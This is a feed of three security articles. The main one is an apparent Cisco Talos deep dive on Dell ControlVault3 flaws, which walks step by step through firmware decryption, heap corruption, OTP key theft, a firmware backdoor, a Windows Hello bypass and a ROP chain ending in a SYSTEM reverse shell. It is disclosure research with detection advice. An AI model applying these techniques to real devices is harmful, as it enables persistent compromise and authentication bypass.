How to implement a blameless approach to cybersecurity | Kaspersky official blog

Even companies with a mature cybersecurity posture and significant investments into data protection aren’t immune to cyber-incidents. Attackers can exploit zero-day vulnerabilities or compromise a supply chain. Employees can fall victim to sophisticated scams designed to breach the company’s defenses. The cybersecurity team itself can make a mistake while configuring security tools, or during an incident response procedure. However, each of these incidents represents an opportunity to improve processes and systems, making your defenses even more effective. This isn’t just a rallying call; it’s a practical approach that’s been successful enough in other fields such as aviation safety.

In aviation, almost everyone in the aviation industry — from aircraft design engineers to flight attendants – is required to share information to prevent incidents. This isn’t limited to crashes or system failures; the industry also reports potential problems. These reports are constantly analyzed, and security measures are adjusted based on the findings. According to Allianz Commercial’s statistics, this continuous implementation of new measures and technologies has led to a significant reduction in fatal incidents — from 40 per million flights in 1959 to 0.1 in 2015.

Still in aviation, it was recognized long ago that this model simply won’t work if people are afraid to report procedure violations, quality issues, and other causes of incidents. That’s why aviation standards include requirements for non-punitive reporting and a just culture, meaning that reporting problems and violations shouldn’t lead to punishment. DevOps engineers have a similar principle they call a blameless culture, which they use when analyzing major incidents. This approach is also essential in cybersecurity.

Does every mistake have a name?

The opposite of a blameless culture is the idea that “every mistake has a name”, meaning a specific person is to blame. Under this approach, every mistake can lead to disciplinary action, including termination. This principle is considered harmful and doesn’t lead to better security.

  • Employees fear accountability and tend to distort facts during incident investigations — or even destroy evidence.
  • Distorted or partially destroyed evidence complicates the response and worsens the overall outcome because security teams can’t quickly and properly assess the scope of a given incident.
  • Zeroing in on one person to blame during an incident review prevents the team from focusing on how to change the system to prevent similar incidents from happening again.
  • Employees are afraid to report violations of IT and security policies, causing the company to miss opportunities to fix security flaws before they lead to a critical incident.
  • Employees have no motivation to discuss cybersecurity issues, coach one another, or correct their coworkers’ mistakes.

To truly enable every employee to contribute to your company’s security, you need a different approach.

The core principles of a just culture

Call it “non-punitive reporting” or a “blameless culture” — the core principles are the same:

  • Everyone makes mistakes. We learn from our mistakes; we don’t punish them. However, it’s crucial to distinguish between an honest mistake and a malicious violation.
  • When analyzing security incidents, the overall context, the employee’s intent, and any systemic issues that may have contributed to the situation all need considering. For example, if a high turnover of seasonal retail employees prevents them from being granted individual accounts, they might resort to sharing a single login for a point-of-sale terminal. Is the store administrator at fault? Probably not.
  • Beyond just reviewing technical data and logs, you must have in-depth conversations with everyone involved in an incident. For this you should create a productive and safe environment where people feel comfortable sharing their perspectives.
  • The goal of an incident review should be to improve behavior, technology, and processes in the future. Regarding the latter for serious incidents, they should be split in to two: immediate response to mitigate the damage, and postmortem analysis to improve your systems and procedures.
  • Most importantly, be open and transparent. Employees need to know how reports of issues and incidents are handled, and how decisions are made. They should know exactly who to turn to if they see or even suspect a security problem. They need to know that both their supervisors and security specialists will support them.
  • Confidentiality and protection. Reporting a security issue should not create problems for the person who reported it or for the person who may have caused it — as long as both acted in good faith.

How to implement these principles in your security culture

Secure leadership buy-in. A security culture doesn’t require massive direct investment, but it does need consistent support from the HR, information security, and internal communications teams. Employees also need to see that top management actively endorses this approach.

Document your approach. The blameless culture philosophy should be captured in your company’s official documents — from detailed security policies to a simple, short guide that every employee will actually read and understand. This document should clearly state the company’s position on the difference between a mistake and a malicious violation. It should formally state that employees won’t be held personally responsible for honest errors, and that the collective priority is to improve the company’s security, and prevent future recurrences.

Create channels for reporting issues. Offer several ways for employees to report problems: a dedicated section on the intranet, a specific email address, or the option to simply tell their immediate supervisor. Ideally, you should also have an anonymous hotline for reporting concerns without fear.

Train employees. Training helps employees recognize insecure processes and behaviors. Use real-world examples of problems they should report, and walk them through different incident scenarios. You can use our online our online Kaspersky Automated Security Awareness Platform to organize these cybersecurity-awareness training sessions. Motivate employees to not only report incidents, but also to suggest improvements and think about how to prevent security problems in their day-to-day work.

Educate your leadership. Every manager needs to understand how to respond to reports from their team. They need to know how and where to forward a report, and how to avoid creating blame-focused islands in a sea of just culture. Teach leaders to respond in a way that makes their coworkers feel supported and protected. Their reactions to incidents and error reports needs to be constructive. Leaders should also encourage discussions of security issues in team meetings to normalize the topic.

Develop a fair review procedure for incidents and security-issue reports. You’ll need to assemble a diverse group of employees from various teams to form a “no-blame review board”. It will be responsible for promptly processing reports, making decisions, and creating action plans for each case.

Reward proactivity. Publicly praise and reward employees who report spearphishing attempts or newly discovered flaws in policies or configurations, or who simply complete awareness training better and faster than others on their team. Mention these proactive employees in regular IT and security communications such as newsletters.

Integrate findings into your security management processes. The conclusions and suggestions from the review board should be prioritized and incorporated into the company’s cyber-resilience plan. Some findings may simply influence risk assessments, while others could directly lead to changes in company policies, or implementation of new technical security controls or reconfiguration of existing ones.

Use mistakes as learning opportunities. Your security awareness program will be more effective if it uses real-life examples from your own organization. You don’t need to name specific individuals, but you can mention teams and systems, and describe attack scenarios.

Measure performance. To ensure this process is working and delivering results, you need to use information security metrics as well as HR and communications KPIs. Track the MTTR for identified issues, the percentage of issues discovered through employee reports, employee satisfaction levels, the number and nature of security issues identified, and the number of employees engaged in suggesting improvements.

Important exceptions

A security culture or blameless culture doesn’t mean that no one is ever held accountable. Aviation safety documents on non-punitive reporting, for example, include crucial exceptions. Protection doesn’t apply when someone knowingly and maliciously deviates from the regulations. This exception prevents an insider who has leaked data to competitors from enjoying complete impunity after confessing.

The second exception is when national or industry regulations require individual employees to be held personally accountable for incidents and violations. Even with this kind of regulation, it’s vital to maintain balance. The focus should remain on improving processes and preventing future incidents —  not on finding who’s to blame. You can still build a culture of trust if investigations are objective and accountability is only applied where it’s truly necessary and justified.

Kaspersky official blog – ​Read More

ReVault! When your SoC turns against you… deep dive edition

For a high-level overview of this research, you can refer to our Vulnerability Spotlight. This is the in-depth version that shares many more technical details. In this post, we’ll be covering the entire research process as well as providing technical explanations of the exploits behind the attack scenarios.

Dell ControlVault is “a hardware-based security solution that provides a secure bank that stores your passwords, biometric templates, and security codes within the firmware.” A daughter board provides this functionality and performs these security features in firmware. Dell refers to the daughter board as a Unified Security Hub (USH), as it is used as a hub to run ControlVault (CV), connecting various security peripherals such as a fingerprint reader, smart card reader and NFC reader.

Why target ControlVault3?

Hindsight is 20/20 and in retrospect, there are plenty of valid reasons to look at it:

  • There is no public research on this device.
  • It is used for security and enhanced logins and thus is used for sensitive functions.
  • It is found in countless Dell laptops and, in particular, places that seek this extra layer of security (e.g., finance, healthcare, government, etc.) are more likely to have it in their environment.

But what really kickstarted this research project was spotting this target that seemed “promising.” What first caught our attention is that most of the Windows services involved with ControlVault3 are not Address Space Layout Randomization (ASLR)-enabled. This means easier exploitation, and possible technical debt in the codebase. Further, the setup bundle comes with multiple drivers and what appears to be a mix of clear text and encrypted firmware. This makes for an exciting challenge that calls for further investigation.

Making a plan

When starting a vulnerability research project, it is good to have some ideas of what we’re trying to achieve. Let’s make a plan that will act as our North Star and guide our steps along the way:

  1. The main application is encrypted, and we want to see what this firmware hides. One of our first tasks should be to find a way to decrypt the application firmware.
  2. This is a vulnerability research project and, as such, we need to understand how to interact with Control Vault, understand its attack surface, and look for vulnerabilities.
  3. The Windows services run without ASLR and have SYSTEM privileges. Those could be standalone targets for local escalation of privilege (EoP) and/or may have interesting exploitation paths.

Gathering information

Information gathering occurred throughout the project. However, to clarify this discussion, we’ll now summarize some of the early findings.

ControlVault is made by Broadcom and leverages their 5820X chip series. Technically, we are only talking about ControlVault3 (or ControlVault3+), but there was a ControlVault2 and a ControlVault (1 being implied) that were using different hardware. The first mentions of ControlVault date back to 2009-2011.

Online research for the BCM5820X chip series yields minimal results, with this NIST certification being the only notable finding. This document clarifies the security posture of the chip and gives some insight into the operations of its cryptographic module.

Other useful resources are forum posts where power users talk about Control Vault, particularly when the power users discuss making it work on Linux. One post eventually lead to a repository providing official (but limited) Linux support. It is worth noting that one of the shared objects in this repository, “libfprint-2-tod-1-broadcom.so”, ships with debug symbols. This can help when reversing the ControlVault ecosystem.

Finally, for a physical representation, the USH board that connects to the laptop and runs the ControlVault firmware is shown below:

Figure 1: Picture of a USH Board running ControlVault.

When connected inside the laptop, it looks like this (battery removed to show the board):

Figure 2: USH board (highlighted in orange) inside a Dell Latitude laptop.

Interesting files in ControlVault3 bundle

ControlVault comes with a lot of files. We cannot look at all of them at once, but there are a few that stick out, mainly the “bin” and “firmware” folders. The former contains the main services used to communicate with ControlVault and the associated shared objects, while the latter is used to push data to the device.

Figure 3: Bin and firmware folders from the ControlVault3 installer.

The firmware folder is also particularly interesting as it contains what we can presume is the code running on the ControlVault device. If we look at the content of these files by running the “strings” command or by opening them in a hex editor, we find that the ones with “SBI” in their names are in plaintext, while the ones named “bcmCitadelXXX” appear to be either compressed or encrypted. From the information we gathered earlier, we know that “SBI” stands for “Secure Boot Image” and is part of the early stage of the device’s boot process; we can then guess the “bcmCitadelXXX” files are the main application firmware that gets started by the SBI.

Reversing the bootloader

As the SBI files are in plaintext and we know from the Broadcom’s documentation that they are ARM code, we can have a look at one of them in our favorite disassembler/decompiler, which might help us figure out how to handle the application firmware itself.

Identifying the SBI load address

The usual first step is to identify the load address of this blob of data which, in our case, is 0x2400CC00. The data starts with a 0x400 bytes header, thus leading to a more reasonable 0x2400D000 base address for the actual start of the code.

To find this value, the trick is to first load the code at an arbitrary address and then look for absolute addresses (e.g., pointers to strings, addresses of functions, etc.) and play the guessing game while rebasing the firmware until everything lines up. The SBI firmware includes a lot of strings, so it’s fairly easy to spot when they are referenced properly. Alternatively, function pointers can also be useful and, conveniently, some can be found close to the start of the code, as an ARM vector table is placed there. This gives away the load address.

Figure 4: Vector table and beginning of the code inside the SBI.

Determining the software architecture

Here, we need to make a choice of what to focus on first. We can either try to map out the general architecture of the SBI and understand how it works or instead keep our eyes on the ball and look for how the application firmware is being decrypted. In practice, we did the latter, but let’s provide a few spoilers to make this easier to follow.

Functions and parameters names

The firmware relies heavily on logging, which can leak function names, variables and some details about the logic of the code itself.

The firmware appears to be running a custom real-time operating system (RTOS) called Citadel RTOS. We can also find debug strings referring to OpenRTOS, which was likely used as a base to CitadelRTOS.

And as mentioned previously, the Linux implementation comes with debug symbols for the host API, which provides lots of data structures and enum values used by ControlVault.

Communication with the firmware

Before going too far into reversing the SBI, let’s have a high-level overview of how communication occurs between host (Windows) and firmware.

Essentially, the USH board is connected to the laptop’s motherboard and appears as a USB device in the device manager. A driver, “cvusbdrv.sys”, creates a device file that can be opened from userland. Various DeviceIoControl commands can be used to manage and communicate with the device:

{
  IOCTL_SUBMIT = 0x5500E004,  // sends CV Command
  IOCTL_RESULT = 0x5500E008,  // result from CV Command
  IOCTL_HSREQ = 0x5500E00C, // Host Storage Request, used by bcmHostStorageService
  IOCTL_HCREQ = 0x5500E01C,  // Host Control Request, used by bcmHostControlService
  IOCTL_FPREQ = 0x5500E024,  // Fingerprint Request 
  IOCTL_CACHE_VER = 0x5500E028,  // Returned cached version string
  IOCTL_CLREQ = 0x5500E030, // Contactless Request (NFC)
};

Communicating with the driver can be made easier by using userland APIs. In particular, the “bcmbipdll.dll” file implements more than 160 high-level functions that can be used to send specific commands to the firmware. These functions are prefixed with “cv_” (e.g., “cv_open”, “cv_close”, “cv_create_object”, etc.) and are referenced as “CV Commands”. Behind the scenes, when invoking one of these commands, IOCTL_SUBMIT / IOCTL_RESULT is issued, and the relevant data is sent over USB to the firmware.

Upon receiving data from the USB endpoints, the firmware will process the data packets and route them to dedicated code paths. For CV commands, the data is passed to a function called “CvManager /CvManager_SBI” that dispatches the command to the function implementing it.

Example: Manual communication with ControlVault

A simple Python script can be used to load “bcmbipdll.dll” and invoke its functions.

For instance, the following will retrieve the version string of the firmware:

Figure 5: Python snippet to retrieve CV’s version string.

The return value:

Figure 6: Version string obtained from cv_get_ush_ver.

As a reminder, the Linux implementation of the host APIs (libfprint-2-tod1-broadcom/usr/lib/x86_64-linux-gnu/libfprint-2/tod-1/ libfprint-2-tod-1-broadcom.so) comes with debug symbols and thus can be used to identify the various structures and parameters involved in the invocation of each CV command.

We will revisit the communication mechanism in the “Exploiting a SYSTEM service” section, but for now, we can return to our original goal of figuring out how to decrypt the application firmware.

Finding the firmware decryption mechanism

We can search the strings inside the SBI to see if anything mentions decryption:

Figure 7: Strings from the SBI firmware mentioning decryption.

As seen in the screenshot above, the USH_UPGRADE functionality mentions decryption failures. And indeed, this functionality is related to application firmware decryption. The USH_UPGRADE functionality is implemented by three CV commands:

  • CV_CMD_FW_UPGRADE_START
  • CV_CMD_FW_UPGRADE_UPDATE
  • CV_CMD_FW_UPGRADE_COMPLETE

Those commands are issued by the “cv_firmware_upgrade” function in “bcmbipdll.dll”.

The firmware update process is a little convoluted:

  1. The host will first flash a file called “bcm_cv_clear_scd.otp” solely composed of “0123456789abcdef” repeated many times. For that, it will use the “cv_flash_update” function.
  2. The host will call “cv_reboot_to_sbi” to restart in SBI mode.
  3. The host will send the CV_CMD_FW_UPGRADE_START command handled in the SBI by “ushFieldUpgradeStart”:
  1. The SBI will try to load from Flash something called a Secure Code Descriptor (SCD) that contains key material (e.g., decryption key, IV, and RSA – public key) but will revert to hardcoded default if no SCD is available. This is what got flashed/erased during step 1.

Figure 8 Using hardcoded defaults during ushFieldUpgradeStart.
Figure 9 Calling the decryption function.

  1. The host will send the first 0x2B0 bytes of the encrypted application firmware. This is an encrypted header defining the parameters of the soon-to-be installed firmware.
  2. The SBI will try to decrypt (AES-CBC), validate, and cryptographically verify
    the header using key material from the SCD or the hardcoded defaults.
  3. Upon success, the SBI will generate new key material to be stored in a
    different section of the SCD and used to store the firmware in an encrypted
    form. This is because the SoC used by ControlVault can execute in place
    (XIP) encrypted code thanks to its Secure Memory Access Unit (SMAU).
  1. Then, the host will send the rest of the firmware split into chunks of 0x100 bytes via the CV_CMD_FW_UPGRADE_UPDATE command handled in the SBI by the “ushFieldUpgradeUpdate” function.
  1. The firmware chunks are decrypted using the same method, but instead of
    using a default IV, the code relies on a custom function from the SMAU
    device to generate an IV based upon the address of the memory block being
    decrypted.
    Note: The base address of this application firmware can be guessed from
    reversing and is 0x63030000.

Figure 10 Computation of address-based IV.

  1. A rolling hash (SHA256) of the decrypted blocks is kept for further validation.
  1. When done sending the encrypted firmware, the host will send the
    CV_CMD_FW_UPGRADE_COMPLETE command handled in the SBI by the
    “ushFieldUpgradeComplete” function.
  1. The SBI will verify the signature of the firmware received based upon the
    already verified header and the rolling hash that was computed while
    decrypting firmware pages.
  2. Upon success, the new SCD will be encrypted and committed to flash using
    a per-device AES key stored in the chip OTP fuses.

Luckily, the hardcoded keys in the “bcmsbiCitadelA0_1.otp file are the ones that were used to encrypt the application firmware, and by re-implementing the algorithm described above, we can successfully decrypt the application firmware and move on to our second objective: looking for vulnerabilities.

Attack surface mapping and vulnerability research

With a freshly decrypted firmware image, it’s easy to jump the gun and start reversing everything, but before we get into the deep end, we should stop and strategize. So, let’s have a look at the architecture of the system and the potential areas of interest:

Figure 11: System architecture.

There are a few angles we can consider:

  • From the host, could we send malicious data to corrupt the application firmware or the SBI code?
  • Could we tamper with the firmware itself and make it misbehave?
  • Could a malicious firmware image compromise the host?
  • What about the hardware peripherals? Could they be compromised or used to compromise the firmware?

The research we’ve conducted explores the first three questions. The fourth one is a potential future research project. Answering the first question will help achieve the next two, so let’s start with this first one.

Finding vulnerabilities in the application firmware

The application firmware accepts more than150 CV commands. This is a massive attack surface and there is a lot to look at. Most of these commands expect a “session” to be already established using the “cv_open” command.  When the interaction is over, the “cv_close” function is used to terminate the session. Let’s look at how these two operate.

cv_open and cv_close

The prototype of “cv_open” is as such:

int __fastcall cv_open(cv_session_flags a1, cv_app_id *appId, cv_user_id *userId, int
*pHandle)

Its implementation is below:

Figure 12: Call to cv_open.

We can see that memory is allocated (line 29), then a tag “SeSs” is written (line 36) as the first four bytes of the session object. After some more processing, the pointer to the session is returned as a handle (line 44) back to the host. The choice of using a pointer as a handle is already a little questionable as it leaks a heap address to the host, but let’s continue.

The prototype for “cv_close” is as follows:

int __fastcall cv_close(cv_session *)

The function takes the pointer to the session we’ve obtained from “cv_open” and attempts to close it by doing the following:

  1. Validate the session (see below)
  2. Erase the “SeSs” tag
  3. Free the memory
Figure 13: Implementation of cv_close.

Meanwhile, the “validate_session” function will:

  1. Verify the pointer provided is within the CV_HEAP
  2. Verify the first 4 bytes match the “SeSs” tag
  3. Extra checks irrelevant for us
Figure 14: Session validation.

This is particularly interesting because, assuming one can place some arbitrary data on the heap, it then becomes easy to forge a fake session and free it, corrupting heap memory in the process. This issue was reported as CVE-2025-25215.

As expected, it is indeed possible to place attacker-controlled data on the heap using functions like “cv_create_object” or “cv_set_object”. Locating said data is a little trickier, as the handles returned by “cv_create_object” are random rather than heap addresses. However, it is possible to create a “session oracle” to help locate real and forged sessions alike. To do so, we can leverage one of the many CV functions that require a session handle but will return a unique error code if the session is invalid. For instance, “cv_get_random” can be used as such:

Figure 15: Implementation of cv_get_random.

If the session fails the “validate_session” check, “cv_get_random” will return CV_INVALID_HANDLE, otherwise it will either return CV_SUCCESS or CV_INVALID_OUTPUT_PARAMETER_LENGTH. This gives a way to identify valid-looking sessions without any side effect.

Debug strings in the application firmware indicate that the heap implementation used is “heap_4.c” from OpenRTOS. At this point, we could use standard heap exploitation techniques to try and corrupt memory, but instead, we chose to look for more vulnerabilities that may be easier to exploit.

securebio_identify

This function is one of the few that does not have “cv” in its names but is called via “cv_identify_feature_set_authenticated”. It is part of the implementation of the WinBio framework used by Windows Hello during fingerprint handling.

The function expects a handle to an object, retrieves it, and copies some of its content:

Figure 16: ”securebio_identify” retrieves and copies object content.

The data is copied from one of the object’s properties into the “data2” stack buffer. To copy the data, “memcpy” is using the property’s size assuming it will fit inside the “data2” buffer. This can be a dangerous assumption: If this property was to be larger than expected, it would lead to a stack overflow.

In practice, objects allocated with “cv_create_object” cannot be used this way as there are checks in place to limit the size of this property. However, because we can corrupt heap data, it is possible to forge a malicious object that will trigger the bug. Alternatively, there might be other legitimate avenues to load a malicious object. For instance, “cv_import_object” is a good candidate. Due to the complexity of the function, we focused on the heap corruption approach instead. Regardless, this bug was reported as CVE-2025-24922.

The general approach to exploiting “securebio_identify” is as follows:

  1. Create a large object on the heap containing fake heap metadata followed by the “SeSs” tag.
  2. Locate the fake session and free it is using “cv_close”. This will mark a chunk of heap memory as freed even though it is still being used by the large object we’ve created.
  3. Allocate a smaller object that will end up being allocated inside the hole we’ve poked inside the large object from step 1.
  4. Use “cv_set_object” to modify the data of the large object and thus corrupt the fields of the small object.
  5. Use the corrupted small object to trigger the stack overflow inside “securebio_identify”. Because the firmware doesn’t have ASLR, it’s easy to find gadgets to fully exploit the function and gain arbitrary code execution inside the firmware.
  6. Optional: Use the large object as an output buffer to store data produced by our exploit and retrieve its content from the host
Figure 17. Overlapping two objects to exploit securebio_identify.

An example of this attack will be used in the next section.

More firmware vulnerabilities

While looking at the application firmware, we also found an out-of-bound read in the “cv_send_blockdata” and an out-of-bound write in “cv_upgrade_sensor_firmware”. Those were reported respectively as CVE-2025-24311 and CVE-2025-25050. We did not use these vulnerabilities for further exploitation.

Arbitrary code execution in the application firmware: What’s next?

If we circle back to our list of goals, now that we have gained code execution in the firmware, we can try to attack the host from this vantage point. To have a stronger and more meaningful case, it would be more interesting to first find a way to permanently modify the firmware. So, let’s do that!

Figure 18: Secure boot process.

This diagram showcases the ControlVault boot process:

  1. The Bootrom verifies the SBIs.
  2. The SBI retrieves keys from the OTP memory to decrypt the SCD.
  3. From the decrypted SCD, the SBI loads the required key material and sets up the SMAU to execute the encrypted firmware in place.
  4. The application firmware is executed.

Surprisingly, at boot time, there’s no cryptographic verification of the application firmware. Cryptographic verification only happens during the firmware update process. The security of the application firmware mostly relies on the security of the OTP keys and the key material stored in the SCD. But now that we have code execution on the firmware, can we leak this key material?

sotp_read_key

The “sotp_read_key” is an internal (i.e., non CV) function that can be used to read key material from the OTP memory of the Broadcom chip. In particular, it is possible to retrieve the AES and HMAC keys that are used to encrypt and authenticate the SCD:



0:00
/0:18



Figure 19: Demo of dumping OTP keys.

By obtaining the device OTP keys, it becomes possible to decrypt its SCD blob and/or forge a new one. This is particularly interesting as we can write an arbitrary SCD blob to flash using the “cv_flash_update” function.

We can create our own RSA public/private keypair and replace the SCD’s public key with the one we’ve just created. Upon firmware update, the new RSA public key will be used for firmware verification. This way, we can modify a firmware file and install it on our device.

To confirm the process works, we modify a firmware to make it send an arbitrary message when Windows requests its USB descriptor:

Figure 20: Malicious USB descriptor returned by a tampered ControlVault.

Firmware modification

Patching “cv_fingerprint_identify”

With the ability to tamper with the firmware, a new attack vector gets unlocked: we can now modify the behaviors of certain functions. In particular, “cv_fingerprint_identify” is used by Windows Hello when a user tries to login with their fingerprint. The host will send a list of handles to check if any of the CV stored fingerprint templates match the fingerprint currently touching the reader. This pseudo matching-in-sensor is done to avoid storing fingerprints templates on the host itself as it could lead to privacy concerns. This creates an interesting opportunity: what if “cv_fingerprint_identify” were to always return true, and thus make Windows Hello accept any fingerprint.



0:00
/0:07



Figure 21: Demo of bypassing Windows Hello.

Exploiting a SYSTEM service

Another consequence of being able to modify the firmware running on our device is that now we can explore the question of whether a malicious ControlVault device can compromise its host.

Primer on host-FW communication

Let’s consider what happens when calling one of the CV Commands, for example “cv_get_random”:

Figure 22: Calling cv_get_random.

  1. The “InitParam_List” function is called to populate two separate arrays of objects: “out_param_list_entry” and “in_param_list_entry”. The former is used to specify the arguments going to the firmware while the latter is used to prepare for the return values expected from the command.
  1. The first parameter of “InitParam_List” is the type of data encapsulation:

cv_param_type_e::CV_ENCAP_STRUC = 0x0, 
cv_param_type_e::CV_ENCAP_LENVAL_STRUC = 0x1, 
cv_param_type_e::CV_ENCAP_LENVAL_PAIR = 0x2,
cv_param_type_e::CV_ENCAP_INOUT_LENVAL_PAIR = 0x3

  1. Depending on the encapsulation type, the parameters will be
    encapsulated/decapsulated slightly differently:
  • STRUC will result in a regular buffer being decapsulated
  • LENVAL_STRUC will result in a length-prefixed buffer (i.e., the first four
    bytes is the size of the data followed by the actual data)
  • LENVAL_PAIR will be decapsulated as two separate parameters (size and
    buffer)
  • INOUT_LENVAL_PAIR will be initialized without data but will get
    decapsulated as two parameters like LENVAL_PAIR
  • “cvhManagerCVAPICall” is called to perform the command and retrieve its result.
    1. From a high-level perspective, when this function is called, the data we are
      sending gets serialized in the appropriate format and an IOCTL_SUBMIT call
      is issued; the data is sent to the firmware eventually.
    2. Once the execution of the command is complete, data is returned and
      deserialized to be populated into the “in_param_list_entry array” that was
      prepared in the previous step
  • Finally, the function “cvhSaveReturnValues” is used to parse the
    “in_param_list_entry array” and extract these values into a caller-provided array of
    objects.
    1. For instance, in the screenshot above (figure 22), there is one parameter in the
      “in_param_list_entry” and its type is CV_ENCAP_INOUT_LENVAL_PAIR. As
      such, upon calling the “cvhSaveReturnValues”, two parameters will be
      produced: the first one being the size of the data returned by
      “cv_get_random” and the second being the actual data.

    On the firmware side, when handling the CV commands, the return values are re-defined, which is surprising:

    Figure 23: CvManager handling the cv_get_random command (firmware-side).

    It turns out that the way this data is processed leads to an unsafe deserialization. We cover the root-cause analysis of this issue in CVE-2025-24919. In short, the redefinition of the firmware-to-host parameters firmware-side can lead to invalid decapsulation of the data on the host. For instance, if a malicious firmware image were to change the return type of “cv_get_random” to be CV_ENCAP_STRUC instead of being CV_INOUT_LENVAL_PAIR, the “pLen” argument that is meant to receive the size of the produced data would instead be filled with the data itself. In figure 22, the “pLen” variable is a stack variable meant to receive a size value as an integer; any data larger than four bytes would thus overflow the stack, possibly leading to arbitrary code execution.

    Exploitation constraints

    “bcmbipdll.dll” file and some of the ControlVault services are not ASLR enabled, which makes exploitation much easier, as it is possible to hardcode offsets which removes the need of finding an information leak that could be leveraged by a malicious ControlVault device. Data Execution Prevention (DEP) is in place, so it is still necessary to perform a ROP chain attack for further exploitation. Surprisingly, another common mitigation is only partially implemented; stack canaries are only occasionally present in the ControlVault services and DLLs. For instance, in the case of “cv_get_random”, even though “pLen” is a stack variable, no stack cookie is included to protect this function. This leads to the side-quest of identifying CV commands that are easy to exploit but also are used in a high privilege context.

    In practice, we have these constraints for our ideal CV command to target:

    • It needs to be used (directly or inside a call-chain) by a high-privilege service.
    • One of the variables fed to the CV Command needs to be a stack variable that can be corrupted using the bug reported in CVE-2025-24919 (e.g., like the “pLen” variable in “cv_get_random”).
    • No stack cookie must be present between the to-be-corrupted stack variable and the return address being the target of the stack overflow.

    Finding what to target

    The “cv_get_random” function would be an ideal candidate, but unfortunately it’s hard to find code that is using this function reliably.

    After investigating most of the CV commands, we found the following:

    Figure 24: WBFUSH_ExistsCVObject calling CSS_GetObject.

    The first argument to this function, “cvHandle”, is a handle to an object. It is passed to “CSS_GetObject”, which will populate the stack variable “objHeader” with the header of the object tied to this handle. Down the call-stack, “cv_get_object” is called with both the “cvHandle” and the “objHeader” variables. Due to these functions’ stack layout, it is possible to leverage CVE-2025-24919 to corrupt the “objHeader” variable and trigger a stack overflow in its parent function.

    Exploitation details

    The “WBFUSH_ExistCVObject” function is used by the “BCMStorageAdapter.dll” to verify if an object handle is tied to a real object stored in the ControlVault firmware. Meanwhile, “BCMStorageAdapter” is part of Broadcom’s implementation of the adapters required to interface with the Windows Biometric Framework (WBF). These adapters are necessary to interface a fingerprint reader with WBF to be used with Windows Hello (fingerprint login) or other biometric-enabled scenarios. Here is the call stack to reach the vulnerable function:

    StorageAdapterControlUnit 
      -> WBFUSH_ExistsCVObject 
        -> CSS_GetObject
          -> cv_get_object

    The “StorageAdapterControlUnit” function can be reached by a regular user opening the proper adapter with “WinBioOpenSession” and then issuing a “WinBioControlUnit” command with the “WINBIO_COMPONENT_STORAGE” component.

    Figure 25: WinBioControlUnit prototype.

    The “ControlCode” parameter specifies which adapter’s function to invoke.

    Figure 26: StorageAdapterControlUnit with ControlCode=2.

    By reversing “BCMStorageAdapter !StorageAdapterControlUnit”, we find that using “ControlCode=2” will lead to calling the “WBFUSH_ExistsCVObject” with caller provided handle. Specifically, the first four bytes of the “SendBuffer” argument passed to “WinBioControlUnit” are cast into the expected object handle.

    With this in mind, the exploitation process is as follows:

    1. Achieve code execution on the firmware to leak the device keys and gain the ability to forge a firmware file that will be accepted by this specific device.
    2. Forge a malicious firmware update with a modified “cv_get_object” function.
      1. The “cv_get_object” function will be backdoored: if the object handle matches a specific magic value (e.g., 0x1337) it will return the stack-overflow payload and tamper with the encapsulation parameters to trigger CVE-2025-24919. If the handle is not 0x1337, “cv_get_object” will execute normally to avoid unintended side-effects from the backdoor.
      2. The stack-overflow payload will be a ROP chain that will eventually lead to the execution of a reverse-shell.
    3. Install the malicious firmware update.
    4. Invoke the “WinBioControlUnit” function with “ControlCode=2” and “b”x37x13x00x00”” as the “SendBuffer” (little-endian representation of 0x1337 as a DWORD).
    5. Connect to the reverse shell and observe having obtained SYSTEM privileges.


    0:00
    /0:22



    Figure 27: Demo SYSTEM service exploit.

    Going further

    Implant

    The process described above could be seen as one of the most convoluted ways to perform an elevation of privileges to SYSTEM on Windows. However, this should be considered in context. There are other services and functions that could be used instead. In our example here, we picked functions that were easy to build a demo with. In practice, other functions could be leveraged so that no user interaction would be required to trigger the vulnerabilities. This would make sense for a standalone implant that could lay dormant and trigger from time to time in order to call home. Development of a weaponized implant is of course beyond the scope of our research.

    Physical attacks

    Another promising angle that we have yet to mention is physical access. The USH board is an internal USB device. It is possible to open the laptop that contains the board and connect to it directly provided the proper connector. There are mitigations against physical access (e.g., chassis intrusion alerts), but those are generally opt-in. As such, an attacker with 10-20 minutes of physical access could perform the same attacks described in this deep dive, but without any of the other requirements (e.g., no need to be able to log in as user; disk encryption would not protect against this, etc.).

    The following video is a short demo of the feasibility of connecting directly to a USH board over USB.



    0:00
    /0:19



    Figure 28: Demo physical attack.

    Please note that in the video above, a ControlVault device is already present but disabled. This is because the machine used already had a ControlVault device built in. The relevant driver/dll were also already installed. Upon connecting the USB cable, a new ControlVault device pops up and this is the one that is being interacted with.

    Impact

    Attack scenario

    The risks we’ve explored in this article can be summarized in the following diagram:

    Figure 29: Attack scenarios.

    The ability to modify the firmware running on one of the USH boards can be used by a local attacker to either gain privileges, bypass fingerprint login and/or compromise Windows. A threat actor could also leverage this in a post-compromise situation. If a user’s workstation is compromised, one could tamper with the ControlVault firmware running on their machine to act as an implant that could remain present even after a full system reinstall.

    Detection

    Detecting a compromised ControlVault device can be tricky. An implant could ignore new firmware updates. This is why verifying that a legitimate firmware update can be successfully installed and then returns the expected version string is a good first check to perform.

    This can be done with the Python code provided at the beginning of this article (figure 5). Alternatively, a second way is to look at the properties of the ControlVault device in the – device manager. The “Versioning” panel will show the ControlVault firmware version as reported by the device.

    Indication of local exploitation of the ControlVault device can be detected by monitoring unexpected processes loading “bcmbipdll.dll” or those trying to open a handle to the ControlVault device itself. The path for the device may depend on the laptop model and its internal USB connections. The full path can be retrieved using “SetupDiGetClassDevsW / SetupDiEnumDeviceInterfaces” with the InterfaceGuid: {79D2E5E9-8883-4E9D-91CBA14D2B145A41}.

    Finally, unexpected crashes in “WinBioSvc”, “bcmHostStorageService”, “bcmHostControlService” or “bcmUshUpgradeService” could be signs of something being amiss.

    Conclusion

    ControlVault is a surprisingly complex attack surface spanning the whole gamut from hardware to firmware and software. Multiple peripherals, frameworks and drivers are involved as well. It has a legacy codebase that can be traced back to the early 2010s and various first party software has interacted with it over the years. This deep dive has barely scratched the surface of ControlVault’s complexity and yet we showed how far reaching the consequences of a compromise could lead to. The most surprising thing could be that our work appears to be the first public research on the subject. Firmware security isn’t a new topic, but still, how many other ControlVault-like devices are yet to be found and assessed for the unexpected risk they may bring?

    Cisco Talos Blog – ​Read More

    Android adware: What is it, and how do I get it off my device?

    Is your phone suddenly flooded with aggressive ads, slowing down performance or leading to unusual app behavior? Here’s what to do.

    WeLiveSecurity – ​Read More

